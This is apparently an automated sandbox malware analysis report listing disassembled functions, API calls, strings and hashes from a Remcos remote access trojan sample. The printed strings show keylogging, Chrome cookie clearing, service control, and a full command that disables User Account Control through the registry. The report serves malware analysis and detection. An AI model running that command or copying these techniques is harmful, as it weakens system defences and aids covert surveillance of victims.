                                              • Opcode ID: 27e8fcf2d593bfcb29fbbdcba0f1e4e320af5ed1be57422a46ca6ec4b7aee416
                                              • Instruction ID: 02777f18cbf370e2f5491fb3c7bf12c60b05d1d278bd763a5e142892a89cc661
                                              • Opcode Fuzzy Hash: 27e8fcf2d593bfcb29fbbdcba0f1e4e320af5ed1be57422a46ca6ec4b7aee416
                                              • Instruction Fuzzy Hash: A601CC722057206FE3386B21EC4AFBF36A8DF45725F60022EF540861C1EFA2AC048661
                                              Function 000CB2A8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 000CB2E4
                                              • GetLastError.KERNEL32 ref: 000CB2EE
                                              Strings
                                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 000CB2AF
                                              • [Chrome Cookies found, cleared!], xrefs: 000CB314
                                              • UserProfile, xrefs: 000CB2B4
                                              • [Chrome Cookies not found], xrefs: 000CB308
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteErrorFileLast
                                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                              • API String ID: 2018770650-304995407
                                              • Opcode ID: 87b9c5bca8bec2d7eb81681b3e4eb0ad5b1498a6ca7b11be16150d74dc7f32fb
                                              • Instruction ID: c5138ae5519f2f16148447e43f786da6321b378a6f6514dbd1aec70519d1ee51
                                              • Opcode Fuzzy Hash: 87b9c5bca8bec2d7eb81681b3e4eb0ad5b1498a6ca7b11be16150d74dc7f32fb
                                              • Instruction Fuzzy Hash: C001A4316441149B8B04BBB8EDABEFF7768AF52714F50011DF802972D3FF619B468692
                                              Function 000DBEB0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • AllocConsole.KERNEL32(00134358), ref: 000DBEB9
                                              • ShowWindow.USER32(00000000,00000000), ref: 000DBED2
                                              • SetConsoleOutputCP.KERNEL32(000004E4), ref: 000DBEF7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Console$AllocOutputShowWindow
                                              • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                              • API String ID: 2425139147-2527699604
                                              • Opcode ID: 1605e820baed5a4a85541e80171c9d83834da287f53fd66300f5633b36ddf510
                                              • Instruction ID: 86f88854c7b6e18131da08f6ebde347198b6f635a4193e3658da3619f9bf161b
                                              • Opcode Fuzzy Hash: 1605e820baed5a4a85541e80171c9d83834da287f53fd66300f5633b36ddf510
                                              • Instruction Fuzzy Hash: 85018FB1A80308BBCA00FBF09D4BFDE37AC6B24B00F500411B604A75C3DBA4A5548B75
                                              Function 000F95FC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                              Download Yara Rule
                                              APIs
                                              • __allrem.LIBCMT ref: 000F9789
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000F97A5
                                              • __allrem.LIBCMT ref: 000F97BC
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000F97DA
                                              • __allrem.LIBCMT ref: 000F97F1
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000F980F
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                              • String ID:
                                              • API String ID: 1992179935-0
                                              • Opcode ID: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                                              • Instruction ID: 3be5cca3111a9fd95d487a8bb863f186e2c5358290017dd98008dbba8263a091
                                              • Opcode Fuzzy Hash: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                                              • Instruction Fuzzy Hash: 40813B72A0070A9BE724AE78CC41BBE73E8AF51764F14413AF651D7AC1EBB0D901DB51
                                              Function 00104B3D Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __cftoe
                                              • String ID:
                                              • API String ID: 4189289331-0
                                              • Opcode ID: d7113b5b8da1dd9804a5f3ad3a4b24bb3768bc24eee96f21eb6d1be57c5b6e92
                                              • Instruction ID: 155e01264caa5ebd234401483d427a4d345149d36a920a8eea136b92366b3d15
                                              • Opcode Fuzzy Hash: d7113b5b8da1dd9804a5f3ad3a4b24bb3768bc24eee96f21eb6d1be57c5b6e92
                                              • Instruction Fuzzy Hash: B9513BB2900209ABDB249B68CDC1FBE77A9EF59330F244219FA94971C2DFB1DD018664
                                              Function 00106159 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __freea$__alloca_probe_16
                                              • String ID: a/p$am/pm
                                              • API String ID: 3509577899-3206640213
                                              • Opcode ID: 3090eec41fb7608d2e46825d5079eb797cb4455543321b0ca90740b8f140afc5
                                              • Instruction ID: bab6282e719ea93440f938dffb5ecbbeab34847de1488e2b8536ae8ffea21459
                                              • Opcode Fuzzy Hash: 3090eec41fb7608d2e46825d5079eb797cb4455543321b0ca90740b8f140afc5
                                              • Instruction Fuzzy Hash: 7FD1F331900206CBDB288F68CD55BBEB7B0FF05350F254159E985AB6D9E3F59DA0CBA0
                                              Function 000D9DEC Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,000D9507,00000000,00000000), ref: 000D9DFC
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,000D9507,00000000,00000000), ref: 000D9E10
                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,000D9507,00000000,00000000), ref: 000D9E1D
                                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,000D9507), ref: 000D9E52
                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,000D9507,00000000,00000000), ref: 000D9E64
                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,000D9507,00000000,00000000), ref: 000D9E67
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                              • String ID:
                                              • API String ID: 493672254-0
                                              • Opcode ID: d988dbffb126a8ced969d8b30ed06f75c41cb853d15e2714200f588877d6e1b3
                                              • Instruction ID: 796f99d50f752869d453c78032900e13dc3dba2ba8ba29a42b48e57ae5f84856
                                              • Opcode Fuzzy Hash: d988dbffb126a8ced969d8b30ed06f75c41cb853d15e2714200f588877d6e1b3
                                              • Instruction Fuzzy Hash: F701D2311483147AD6159768AD4EEBF3BACDB46370F10420AF521963C1DA60CE4191B0
                                              Function 000F7E06 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(?,?,000F7DFD,000F77B1), ref: 000F7E14
                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 000F7E22
                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000F7E3B
                                              • SetLastError.KERNEL32(00000000,?,000F7DFD,000F77B1), ref: 000F7E8D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLastValue___vcrt_
                                              • String ID:
                                              • API String ID: 3852720340-0
                                              • Opcode ID: ee8de85554cee9ce71e77fefffa6d33e36abd5c50ba281fac5e40834adc17d7c
                                              • Instruction ID: 77a541ea865484a8427c558bcd6b489265d228e56abac613f1684d19fe403689
                                              • Opcode Fuzzy Hash: ee8de85554cee9ce71e77fefffa6d33e36abd5c50ba281fac5e40834adc17d7c
                                              • Instruction Fuzzy Hash: A501D83231C31D5DDA6926746D85ABB26D9DB0A3B4B20037BF72881DF2EF614C41B242
                                              Function 00106EBF Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(?,000FE260,000F931C,000FE260,?,?,000FB955,FF8BC35D), ref: 00106EC3
                                              • _free.LIBCMT ref: 00106EF6
                                              • _free.LIBCMT ref: 00106F1E
                                              • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00106F2B
                                              • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00106F37
                                              • _abort.LIBCMT ref: 00106F3D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$_free$_abort
                                              • String ID:
                                              • API String ID: 3160817290-0
                                              • Opcode ID: 84fec61700b138ee09ae22c898ceb5ac410d1d0e412a1607ac3b19406f6251ad
                                              • Instruction ID: fc978750c33b13b5fbb8ed7b665e7c76bb73ee4ed6c6a2c365cdf052953ed763
                                              • Opcode Fuzzy Hash: 84fec61700b138ee09ae22c898ceb5ac410d1d0e412a1607ac3b19406f6251ad
                                              • Instruction Fuzzy Hash: 14F0283960870277C6267374ED16EAF25659BE27B0F254014F984E22D6EFF08C624121
                                              Function 000D9C20 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,000D979B,00000000,00000000), ref: 000D9C2F
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,000D979B,00000000,00000000), ref: 000D9C43
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,000D979B,00000000,00000000), ref: 000D9C50
                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,000D979B,00000000,00000000), ref: 000D9C5F
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,000D979B,00000000,00000000), ref: 000D9C71
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,000D979B,00000000,00000000), ref: 000D9C74
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ControlManager
                                              • String ID:
                                              • API String ID: 221034970-0
                                              • Opcode ID: f33ab71cff5cc3a5d3692edee01d00de9c92b854bad4438bbaaab0d7b7bb4ac8
                                              • Instruction ID: 0f759c922b053c80a4b21fcb8e374e5c79997b074300b6c354e535c02a96e14c
                                              • Opcode Fuzzy Hash: f33ab71cff5cc3a5d3692edee01d00de9c92b854bad4438bbaaab0d7b7bb4ac8
                                              • Instruction Fuzzy Hash: 44F0F6325403147BD3146B64AD89EFF3B7CDB4A360F004015F901D2282DB64CE8595F0
                                              Function 000D9D22 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,000D9719,00000000,00000000), ref: 000D9D31
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,000D9719,00000000,00000000), ref: 000D9D45
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,000D9719,00000000,00000000), ref: 000D9D52
                                              • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,000D9719,00000000,00000000), ref: 000D9D61
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,000D9719,00000000,00000000), ref: 000D9D73
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,000D9719,00000000,00000000), ref: 000D9D76
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ControlManager
                                              • String ID:
                                              • API String ID: 221034970-0
                                              • Opcode ID: d2ef2177cfd91f18a9ff4766ff8011e1ae8666074391cb9a4efa5c7966ea24c2
                                              • Instruction ID: d0d96b0d2a527cb140263e7ddcb5a2225cb4c6a5e6e8f324c7b22f7e70fbcf5e
                                              • Opcode Fuzzy Hash: d2ef2177cfd91f18a9ff4766ff8011e1ae8666074391cb9a4efa5c7966ea24c2
                                              • Instruction Fuzzy Hash: 6EF062725443147BD2156B64AC89EFF3B7CDB4A761B004019FA0692292DB74CE4696B0
                                              Function 000D9D87 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,000D9697,00000000,00000000), ref: 000D9D96
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,000D9697,00000000,00000000), ref: 000D9DAA
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,000D9697,00000000,00000000), ref: 000D9DB7
                                              • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,000D9697,00000000,00000000), ref: 000D9DC6
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,000D9697,00000000,00000000), ref: 000D9DD8
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,000D9697,00000000,00000000), ref: 000D9DDB
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ControlManager
                                              • String ID:
                                              • API String ID: 221034970-0
                                              • Opcode ID: 0cb31413cc06ec0bb6c938e81c59c2588e7075c9119cd748a184f9b1a598c26d
                                              • Instruction ID: 4e59bcab5073edf3a51eed5f6f85f63609ed22aa7e8745681a85863083bf6df9
                                              • Opcode Fuzzy Hash: 0cb31413cc06ec0bb6c938e81c59c2588e7075c9119cd748a184f9b1a598c26d
                                              • Instruction Fuzzy Hash: 98F090725443187BD715AB64AC89EFF3B7CDB4A6A0F04401AFE05D2282DB64CE8696B0
                                              Function 004930A0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 237COMMON
                                              Download Yara Rule
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004930C2
                                              • __allrem.LIBCMT ref: 00493163
                                              • __allrem.LIBCMT ref: 00493211
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00493232
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                              • String ID: gfff
                                              • API String ID: 1992179935-1553575800
                                              • Opcode ID: 909063c54548ab0acba61d0d3cc2af11cb58f79ae02012acdd2ebfa6cf058626
                                              • Instruction ID: 8483a46b589cb985f3b50d97f83bcfce0800402eec219d4dcdb42ed114fc504e
                                              • Opcode Fuzzy Hash: 909063c54548ab0acba61d0d3cc2af11cb58f79ae02012acdd2ebfa6cf058626
                                              • Instruction Fuzzy Hash: BB71E5727143108BCB18CF19DC41A2BBBD6AFD5314F49893EF445CB3A1E678EA098796
                                              Function 000DA81D Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000D2584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 000D25A6
                                                • Part of subcall function 000D2584: RegQueryValueExW.ADVAPI32(?,000CE0BA,00000000,00000000,?,00000400), ref: 000D25C5
                                                • Part of subcall function 000D2584: RegCloseKey.ADVAPI32(?), ref: 000D25CE
                                                • Part of subcall function 000DB15B: GetCurrentProcess.KERNEL32(?,?,?,000CC914,WinDir,00000000,00000000), ref: 000DB16C
                                              • _wcslen.LIBCMT ref: 000DA8F6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                              • String ID: .exe$http\shell\open\command$program files (x86)\$program files\
                                              • API String ID: 37874593-4246244872
                                              • Opcode ID: f483ae5e0fc1a96ffe13c0bd3d34ac4bf8bd784c3f55ddfa29968e5893e14c62
                                              • Instruction ID: aebea86a11615110e955b022d99819f54a15e63fbbcb3b22947d269e6f22391d
                                              • Opcode Fuzzy Hash: f483ae5e0fc1a96ffe13c0bd3d34ac4bf8bd784c3f55ddfa29968e5893e14c62
                                              • Instruction Fuzzy Hash: 49215372B002086BDB18BBB49C97EEE77AD9B45350B15053EF402E72C3EE749D298761
                                              Function 000CA876 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 000CA884
                                              • wsprintfW.USER32 ref: 000CA905
                                                • Part of subcall function 000C9D58: SetEvent.KERNEL32(?,?,00000000,000CA91C,00000000), ref: 000C9D84
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: EventLocalTimewsprintf
                                              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                              • API String ID: 1497725170-248792730
                                              • Opcode ID: 248814931c9e52931ce5c22aeb3aa9bfd30999a1d82fe0c90e5ee5734ef811c1
                                              • Instruction ID: 5bd141a5c5895b2aec551bc853c680191d0aef3404df200dbc2dab02785e4123
                                              • Opcode Fuzzy Hash: 248814931c9e52931ce5c22aeb3aa9bfd30999a1d82fe0c90e5ee5734ef811c1
                                              • Instruction Fuzzy Hash: AB116372504018BACB18BB94EC56DFF77B8AF49361B10411EF402A6193EF785A86D6A4
                                              Function 000DCA1F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegisterClassExA.USER32(00000030), ref: 000DCA6C
                                              • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 000DCA87
                                              • GetLastError.KERNEL32 ref: 000DCA91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ClassCreateErrorLastRegisterWindow
                                              • String ID: 0$MsgWindowClass
                                              • API String ID: 2877667751-2410386613
                                              • Opcode ID: be597c30dffb8e218fc524589142d287a01f86f2c4649810af9585d4053eb1ff
                                              • Instruction ID: ef8f60f091d566150f18ccb170d7e398171b81fdb0ba378acb6493e3a2fe5607
                                              • Opcode Fuzzy Hash: be597c30dffb8e218fc524589142d287a01f86f2c4649810af9585d4053eb1ff
                                              • Instruction Fuzzy Hash: 3C0129B1D1031EAB9B00CFE9DDC49EFBBBCBF49248B50452AE410B2240E7704A458FA1
                                              Function 000C69BA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 000C6A00
                                              • CloseHandle.KERNEL32(?), ref: 000C6A0F
                                              • CloseHandle.KERNEL32(?), ref: 000C6A14
                                              Strings
                                              • C:\Windows\System32\cmd.exe, xrefs: 000C69FB
                                              • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 000C69F6
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle$CreateProcess
                                              • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                              • API String ID: 2922976086-4183131282
                                              • Opcode ID: 9f278fd609238f6d64cad811abf7296060d94ec275b95c2df9126d9ac7e05f0e
                                              • Instruction ID: 75309e354acf0123f1cb999f0e049635791bc996cd9c46a51c01fbffeab29a21
                                              • Opcode Fuzzy Hash: 9f278fd609238f6d64cad811abf7296060d94ec275b95c2df9126d9ac7e05f0e
                                              • Instruction Fuzzy Hash: 47F090729002ACBACB20ABD69C0DEDF7F3CEBC1B10F000419B605A6191D6705540CAB4
                                              Function 001025D9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0010258A,001053F8,?,0010252A,001053F8,0012DAE0,0000000C,00102681,001053F8,00000002), ref: 001025F9
                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0010260C
                                              • FreeLibrary.KERNEL32(00000000,?,?,?,0010258A,001053F8,?,0010252A,001053F8,0012DAE0,0000000C,00102681,001053F8,00000002,00000000), ref: 0010262F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressFreeHandleLibraryModuleProc
                                              • String ID: CorExitProcess$mscoree.dll
                                              • API String ID: 4061214504-1276376045
                                              • Opcode ID: bb2249a3a42db93ba86b486501c84b8dde2fa548b1c7f33f66525022e5cc355f
                                              • Instruction ID: 102feb68821787254f7710ee33a67314f3cd2d0b4e960b6b0c2e2c88a11ed83d
                                              • Opcode Fuzzy Hash: bb2249a3a42db93ba86b486501c84b8dde2fa548b1c7f33f66525022e5cc355f
                                              • Instruction Fuzzy Hash: 68F04430904219FBCB199F65DD0DBEDBFB8EB08751F004068F805A2690DF719D81CA95
                                              Function 000C4AB1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000C4AED
                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000C483F,00000001), ref: 000C4AF9
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,000C483F,00000001), ref: 000C4B04
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000C483F,00000001), ref: 000C4B0D
                                                • Part of subcall function 000DA686: GetLocalTime.KERNEL32(00000000), ref: 000DA6A0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                              • String ID: KeepAlive | Disabled
                                              • API String ID: 2993684571-305739064
                                              • Opcode ID: 2715dda00cc925dc2fbbb0b46159c079648447b7c8ef31287ea727aae8942b70
                                              • Instruction ID: 202288759415c9af541b34d17caae75e53a49f18de4f702eab8e4d60e57f469a
                                              • Opcode Fuzzy Hash: 2715dda00cc925dc2fbbb0b46159c079648447b7c8ef31287ea727aae8942b70
                                              • Instruction Fuzzy Hash: 7BF09671908350ABDB1537749D0AAEE7EA9AB02320F00491DF491427A2DA7088918752
                                              Function 000D9F32 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000DA686: GetLocalTime.KERNEL32(00000000), ref: 000DA6A0
                                              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 000D9F64
                                              • PlaySoundW.WINMM(00000000,00000000), ref: 000D9F72
                                              • Sleep.KERNEL32(00002710), ref: 000D9F79
                                              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 000D9F82
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: PlaySound$HandleLocalModuleSleepTime
                                              • String ID: Alarm triggered
                                              • API String ID: 614609389-2816303416
                                              • Opcode ID: 902d79527c9160b4a98a9d8304a3f6424f6fd6edd60f8cfbd40e1d5242165d61
